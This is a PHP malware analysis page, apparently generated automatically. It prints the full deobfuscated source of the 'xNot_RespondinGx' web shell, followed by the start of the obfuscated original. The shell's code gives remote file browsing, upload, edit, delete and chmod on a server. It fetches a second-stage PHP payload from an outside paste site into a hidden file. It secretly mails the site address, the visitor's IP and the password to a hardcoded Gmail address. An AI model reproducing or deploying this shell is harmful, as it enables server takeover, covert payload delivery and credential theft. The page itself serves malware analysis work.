PHP Malware Analysis

Back to list

Tags

URLs
https://fonts.googleapis.com/css?family=Ubuntu+Mono
https://0paste.com/122966.txt
Emails
ramdan19id@gmail.com
Input
_GET
_POST
Environment
set_time_limit
error_reporting
getcwd

Deobfuscated code

<?php

/*
            xNot_RespondinGx Shell version 2.1
            Created By : xNot_RespondinGx
            Facebook   : fb.com/sontik.sontik5
*/
$xNot = "Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXQOJl5aTmJJalYWUmJxalmJvEpqcn5KakaxSVFRallGioVfvklRppQYA0A";
$xNot2 = "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";
eval /* PHPDeobfuscator eval output */ {
    /*
        xNot_RespondinGx mini shell v2.1
    */
    set_time_limit(0);
    error_reporting(0);
    error_log(0);
    $__gcdir = "getcwd";
    $__fgetcon7s = "file_get_contents";
    $__scdir = "scandir";
    $rm__dir = "rmdir";
    $un__link = "unlink";
    if (get_magic_quotes_gpc()) {
        foreach ($_POST as $key => $value) {
            $_POST[$key] = stripslashes($value);
        }
    }
    echo "<!DOCTYPE HTML>\r\n<html>\r\n<head>\r\n<link href=\"\" rel=\"stylesheet\" type=\"text/css\">\r\n<style>\r\n@import url(\"https://fonts.googleapis.com/css?family=Ubuntu+Mono\");\r\nbody{\r\nfont-family: \"Ubuntu Mono\", monospace;\r\nfont-weight: normal;\r\nfont-style: normal;\r\nbackground-color: black;\r\ncolor:#87CEFA;\r\n}\r\n#content tr:hover{\r\nbackground-color: black;\r\n}\r\n#content .first{\r\nbackground-color: #87CEFA;\r\n}\r\ntable{\r\nborder: 1px #87CEFA solid;\r\n}\r\na{\r\ncolor:#87CEFA;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor:#87CEFA;\r\n}\r\ninput,select,textarea{\r\nborder: 1px #000000 solid;\r\n-moz-border-radius: 5px;\r\n-webkit-border-radius:5px;\r\nborder-radius:5px;\r\n}\r\n</style>\r\n</head><center><h1><b><font color=#87CEFA size=8>xNot_RespondinGx</font></a></h1></b></center>\r\n<body>\r\n<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n";
    echo "<tr><td>";
    echo "<center><a href='?dir={$dir}&jancok=sumon'> Sumon | </a><a href='?dir={$dir}&kill=self'>Kill</a><br><br>";
    echo "<font color='#87CEFA'>Dir:</font> ";
    if (isset($_GET['path'])) {
        $path = $_GET['path'];
    } else {
        $path = $__gcdir();
    }
    $buffs = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIkJhcnUgc2FqYSBkaSBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQogICRib2R5ICAgID0gImRpcmVjdG9yeTogJHRhcmdldCBieTogJHZpc2l0b3IgcGFzc3dvcmQ6ICRhdXRoX3Bhc3MiOw0KICBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJyYW1kYW4xOWlkQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHMiLCR2aXNpdGMpOw==";
    eval /* PHPDeobfuscator eval output */ {
        $visitc = $_COOKIE["visits"];
        if ($visitc == "") {
            $visitc = 0;
            $visitor = $_SERVER["REMOTE_ADDR"];
            $web = $_SERVER["HTTP_HOST"];
            $inj = $_SERVER["REQUEST_URI"];
            $target = rawurldecode($web . $inj);
            $judul = "Baru saja di http://{$target} by {$visitor}";
            $body = "directory: {$target} by: {$visitor} password: {$auth_pass}";
            if (!empty($web)) {
                @mail("ramdan19id@gmail.com", $judul, $body, $auth_pass);
            }
        } else {
            $visitc++;
        }
        @setcookie("visits", $visitc);
    };
    $path = str_replace('\\', '/', $path);
    $paths = explode('/', $path);
    foreach ($paths as $id => $pat) {
        if ($pat == '' && $id == 0) {
            $a = true;
            echo "<a href=\"?path=/\">/</a>";
            continue;
        }
        if ($pat == '') {
            continue;
        }
        echo "<a href=\"?path=";
        for ($i = 0; $i <= $id; $i++) {
            echo "{$paths[$i]}";
            if ($i != $id) {
                echo "/";
            }
        }
        echo '">' . $pat . '</a>/';
    }
    echo "</td></tr><tr><td>";
    if (isset($_FILES['file'])) {
        if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
            echo "<font color=\"green\">Upload Berhasil</font><br />";
        } else {
            echo "<font color=\"red\">Upload Gagal</font><br/>";
        }
    }
    echo "<form enctype=\"multipart/form-data\" method=\"POST\">\r\n<font color=\"#87CEFA\">File Upload :</font> <input type=\"file\" name=\"file\" />\r\n<input type=\"submit\" value=\"upload\" />\r\n</form>\r\n</td></tr>";
    if ($_GET['kill'] == 'self') {
        if (@$un__link("/var/www/html/input.php")) {
            die('<center><br><center><h2>xNot_RespondinGx Always Gans :v</h2></center></center>');
        } else {
            echo "<center>\$un__link failed!</center>";
        }
    }
    if ($_GET['jancok'] == 'sumon') {
        $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
        function sumon($url, $isi)
        {
            $fp = fopen($isi, "w");
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_FILE, $fp);
            return curl_exec($ch);
        }
        if (file_exists('.01.php.php')) {
            echo "<center><font color=white><a href='{$full}/.Rmdn.php.php' target='_blank'>-> .01.php sukses <-</a></font></center>";
        } else {
            if (sumon("https://0paste.com/122966.txt", ".Rmdn.php.php")) {
                echo "<center><font color=white><a href='{$full}/.Rmdn.php.php' target='_blank'>-> .01.php sukses <-</a></font></center>";
            } else {
                echo "<center><font color=red>gagal cok</font></center>";
            }
        }
    }
    if (isset($_GET['filesrc'])) {
        echo "<tr><td>Current File : ";
        echo $_GET['filesrc'];
        echo "</tr></td></table><br />";
        echo '<pre>' . htmlspecialchars($__fgetcon7s($_GET['filesrc'])) . '</pre>';
    } elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
        echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
        if ($_POST['opt'] == 'chmod') {
            if (isset($_POST['perm'])) {
                if (chmod($_POST['path'], $_POST['perm'])) {
                    echo "<font color=\"green\">Change Permission Berhasil</font><br/>";
                } else {
                    echo "<font color=\"red\">Change Permission Gagal</font><br />";
                }
            }
            echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
        } elseif ($_POST['opt'] == 'rename') {
            if (isset($_POST['newname'])) {
                if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
                    echo "<font color=\"green\">Ganti Nama Berhasil</font><br/>";
                } else {
                    echo "<font color=\"red\">Ganti Nama Gagal</font><br />";
                }
                $_POST['name'] = $_POST['newname'];
            }
            echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
        } elseif ($_POST['opt'] == 'edit') {
            if (isset($_POST['src'])) {
                $fp = fopen($_POST['path'], 'w');
                if (fwrite($fp, $_POST['src'])) {
                    echo "<font color=\"green\">Berhasil Edit File</font><br/>";
                } else {
                    echo "<font color=\"red\">Gagal Edit File</font><br/>";
                }
                fclose($fp);
            }
            echo '<form method="POST">
<textarea cols=80 rows=20 name="src">' . htmlspecialchars($__fgetcon7s($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Save" />
</form>';
        }
        echo "</center>";
    } else {
        echo "</table><br/><center>";
        if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
            if ($_POST['type'] == 'dir') {
                if ($rm__dir($_POST['path'])) {
                    echo "<font color=\"green\">Directory Terhapus</font><br/>";
                } else {
                    echo "<font color=\"red\">Directory Gagal Terhapus                                                                                                                                                                                                                                                                                             </font><br/>";
                }
            } elseif ($_POST['type'] == 'file') {
                if ($un__link($_POST['path'])) {
                    echo "<font color=\"green\">File Terhapus</font><br/>";
                } else {
                    echo "<font color=\"red\">File Gagal Dihapus</font><br/>";
                }
            }
        }
        echo "</center>";
        $_scdir = $__scdir($path);
        echo "<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr class=\"first\">\r\n<td><center>Name</peller></center></td>\r\n<td><center>Size</peller></center></td>\r\n<td><center>Permission</peller></center></td>\r\n<td><center>Modify</peller></center></td>\r\n</tr>";
        foreach ($_scdir as $dir) {
            if (!is_dir($path . '/' . $dir) || $dir == '.' || $dir == '..') {
                continue;
            }
            echo '<tr>
<td><a href="?path=' . $path . '/' . $dir . '">' . $dir . '</a></td>
<td><center>--</center></td>
<td><center>';
            if (is_writable($path . '/' . $dir)) {
                echo "<font color=\"lime\">";
            } elseif (!is_readable($path . '/' . $dir)) {
                echo "<font color=\"red\">";
            }
            echo perms($path . '/' . $dir);
            if (is_writable($path . '/' . $dir) || !is_readable($path . '/' . $dir)) {
                echo "</font>";
            }
            echo '</center></td>
<td><center><form method="POST" action="?option&path=' . $path . '">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
</select>
<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="' . $dir . '">
<input type="hidden" name="path" value="' . $path . '/' . $dir . '">
<input type="submit" value=">">
</form></center></td>
</tr>';
        }
        echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
        foreach ($_scdir as $file) {
            if (!is_file($path . '/' . $file)) {
                continue;
            }
            $size = filesize($path . '/' . $file) / 1024;
            $size = round($size, 3);
            if ($size >= 1024) {
                $size = round($size / 1024, 2) . ' MB';
            } else {
                $size .= ' KB';
            }
            echo '<tr>
<td><a href="?filesrc=' . $path . '/' . $file . '&path=' . $path . '">' . $file . '</a></td>
<td><center>' . $size . '</center></td>
<td><center>';
            if (is_writable($path . '/' . $file)) {
                echo "<font color=\"lime\">";
            } elseif (!is_readable($path . '/' . $file)) {
                echo "<font color=\"red\">";
            }
            echo perms($path . '/' . $file);
            if (is_writable($path . '/' . $file) || !is_readable($path . '/' . $file)) {
                echo "</font>";
            }
            echo '</center></td>
<td><center><form method="POST" action="?option&path=' . $path . '">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="' . $file . '">
<input type="hidden" name="path" value="' . $path . '/' . $file . '">
<input type="submit" value=">">
</form></center></td>
</tr>';
        }
        echo "</table>\r\n</div>";
    }
    echo "\r\n</body>\r\n</html>";
    function perms($file)
    {
        $perms = fileperms($file);
        if (($perms & 0xc000) == 0xc000) {
            // Socket
            $info = 's';
        } elseif (($perms & 0xa000) == 0xa000) {
            // Symbolic Link
            $info = 'l';
        } elseif (($perms & 0x8000) == 0x8000) {
            // Regular
            $info = '-';
        } elseif (($perms & 0x6000) == 0x6000) {
            // Block special
            $info = 'b';
        } elseif (($perms & 0x4000) == 0x4000) {
            // Directory
            $info = 'd';
        } elseif (($perms & 0x2000) == 0x2000) {
            // Character special
            $info = 'c';
        } elseif (($perms & 0x1000) == 0x1000) {
            // FIFO pipe
            $info = 'p';
        } else {
            // Unknown
            $info = 'u';
        }
        $info .= $perms & 0x100 ? 'r' : '-';
        $info .= $perms & 0x80 ? 'w' : '-';
        $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
        $info .= $perms & 0x20 ? 'r' : '-';
        $info .= $perms & 0x10 ? 'w' : '-';
        $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
        $info .= $perms & 0x4 ? 'r' : '-';
        $info .= $perms & 0x2 ? 'w' : '-';
        $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
        return $info;
    }
};
exit;


Original code

<?php
/*
            xNot_RespondinGx Shell version 2.1
            Created By : xNot_RespondinGx
            Facebook   : fb.com/sontik.sontik5
*/
$xNot = "Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXQOJl5aTmJJalYWUmJxalmJvEpqcn5KakaxSVFRallGioVfvklRppQYA0A";
$xNot2 = "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